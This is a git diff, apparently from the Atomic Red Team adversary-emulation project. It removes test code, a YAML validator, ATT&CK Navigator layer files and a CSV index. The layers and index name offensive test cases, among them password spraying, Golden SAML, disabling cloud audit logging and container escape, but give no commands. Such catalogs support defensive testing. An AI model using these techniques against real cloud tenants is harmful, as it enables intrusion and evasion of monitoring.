keys=alphanumeric_underscore_strategy, values=st.one_of(*input_args_types)
)
atomics_strategy = dict(
input_arguments=input_arguments_strategy,
name=alphanumeric_underscore_strategy,
description=st.text(min_size=5),
supported_platforms=platforms_strategy,
)
def atomic_manual_executor_builder():
def build_atomic(input_arguments, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
**kwargs,
executor=ManualExecutor(
name="manual", steps=f"{formatted_args} Custom steps here..."
),
input_arguments=input_arguments,
)
return st.builds(build_atomic, **atomics_strategy)
def atomic_command_executor_builder():
def build_atomic(input_arguments, executor_name, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
executor=CommandExecutor(
name=executor_name,
command=f"{formatted_args} Custom steps here...",
elevation_required="sudo" in formatted_args,
),
input_arguments=input_arguments,
**kwargs,
)
return st.builds(build_atomic, executor_name=executor_strategy, **atomics_strategy)
@given(
st.builds(
Technique,
attack_technique=st.integers(min_value=1000, max_value=9999).map(
lambda x: f"T{x}"
),
atomic_tests=st.lists(
st.one_of(
atomic_manual_executor_builder(), atomic_command_executor_builder()
),
min_size=1,
),
)
)
@settings(max_examples=500, suppress_health_check=[HealthCheck.too_slow])
def test_property(instance):
assert isinstance(instance, Technique)
assert len(instance.attack_technique) > 4
assert len(instance.display_name) >= 5
for test in instance.atomic_tests:
assert isinstance(test, Atomic)
assert test.executor.name in ExecutorType.__args__
-31
View File
@@ -1,31 +0,0 @@
from atomic_red_team.new_atomic import create_or_append_atomic
def test_create_or_append_atomic_creates_new_technique_file(tmp_path):
atomics_dir = tmp_path / "atomics"
output_path = create_or_append_atomic("t1001", atomics_dir=atomics_dir)
assert output_path == atomics_dir / "T1001" / "T1001.yaml"
assert "attack_technique: T1001" in output_path.read_text()
assert "atomic_tests:" in output_path.read_text()
def test_create_or_append_atomic_appends_atomic_test_to_existing_file(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
output_path = technique_dir / "T1001.yaml"
output_path.write_text(
"attack_technique: T1001\n"
"display_name: Existing Technique\n"
"atomic_tests:\n"
"- name: Existing test\n"
)
create_or_append_atomic("T1001", atomics_dir=atomics_dir)
output = output_path.read_text()
assert "- name: Existing test" in output
assert output.count("- name: TODO") == 1
assert output.count("atomic_tests:") == 1
-20
View File
@@ -1,20 +0,0 @@
import os
from os.path import dirname, realpath
from pathlib import Path
import pytest
from pydantic import ValidationError
from atomic_red_team.validator import Validator
test_data_path = f"{dirname(dirname(realpath(__file__)))}/test_data"
@pytest.mark.parametrize("test_input", list(os.scandir(test_data_path)))
def test_all_invalid_scenarios(test_input):
validator = Validator()
with pytest.raises(ValidationError) as exc_info:
validator.validate(test_input)
error_types = [e["type"] for e in exc_info.value.errors()]
assert Path(test_input).stem in error_types
-116
View File
@@ -1,116 +0,0 @@
import collections
import fnmatch
from os import DirEntry
from pydantic import ValidationError
from pydantic_core import InitErrorDetails, PydanticCustomError
from ruamel.yaml import YAML
from atomic_red_team.common import atomics_path, used_guids_file
from atomic_red_team.models import Technique
yaml = YAML(typ="safe")
def format_validation_error(error: ValidationError):
if len(error.errors()) == 1:
err = error.errors()[0]
message = ""
if err["type"] == "elevation_required_but_not_provided":
return {err["msg"]: list(err.get("loc")) + err.get("ctx").get("loc")}
if err["input"] and err["type"] != "unused_input_argument":
message += f"{err['input']} - "
return {message + err["msg"]: err.get("loc")}
inputs = collections.defaultdict(set)
for e in error.errors():
if e["type"] == "elevation_required_but_not_provided":
return {e["msg"]: e.get("loc") + e.get("ctx").get("loc")}
# If it's a union type, then it generates multiple errors for the same input arguments.
# Here we collect only the common paths. For example,
# [( input_arguments, url_parsing),(input_arguments, string_mismatch)] => (input_arguments)
if len(inputs[e["input"]]) == 0:
inputs[e["input"]] = e.get("loc", tuple())
else:
inputs[e["input"]] = tuple(
[x for x in inputs[e["input"]] if x in e.get("loc", tuple())]
)
return dict(inputs)
class Validator:
def __init__(self):
with open(used_guids_file, "r") as f:
self.used_guids = [x.strip() for x in f.readlines()]
self.guids = []
def validate(self, obj: DirEntry):
if obj.is_file():
if fnmatch.fnmatch(obj.name, "*.y*ml"):
self.validate_file(obj)
if obj.is_dir():
self.validate_directory(obj)
def validate_file(self, file: DirEntry):
"""Performs file validation"""
self.validate_yaml_extension(file)
self.validate_atomic(file)
def validate_atomic(self, file: DirEntry):
"""Validates whether the defined input args are used."""
with open(file.path, "r") as f:
atomic = yaml.load(f)
technique = Technique(**atomic)
for index, t in enumerate(technique.atomic_tests):
if t.auto_generated_guid:
if t.auto_generated_guid not in self.guids:
self.guids.append(t.auto_generated_guid)
else:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"reused_guid",
f"GUID {t.auto_generated_guid} reused for test {t.name}. GUIDs are auto generated. You can remove atomic_tests[{index}].auto_generated_guid",
),
loc=("atomic_tests", index, "auto_generated_guid"),
input=t.auto_generated_guid,
)
],
)
def validate_yaml_extension(self, file: DirEntry):
"""Validates the yaml extension"""
if fnmatch.fnmatch(file.path, "*.yml"):
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_filename",
"Rename file from .yml to .yaml",
),
loc=["filename"],
)
],
)
def validate_directory(self, directory: DirEntry):
"""Performs directory validation"""
self.validate_directory_path(directory)
def validate_directory_path(self, directory: DirEntry):
"""Validated whether the directory is allowed directory name (`src` or `bin`)"""
if directory.name not in ["src", "bin"]:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_directory",
"Invalid path. `src` and `bin` are the only two directories supported.",
),
loc=["directory"],
)
],
)
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]},{"techniqueID":"T1685","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}],"comment":"\n- AWS - GuardDuty Suspension or Deletion\n"},{"techniqueID":"T1685.002","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1685","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}]},{"techniqueID":"T1685.002","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1685","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}]},{"techniqueID":"T1685.002","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1685","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}],"comment":"\n- office-365-Disable-AntiPhishRule\n"},{"techniqueID":"T1685.002","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1,23 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-impairment,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
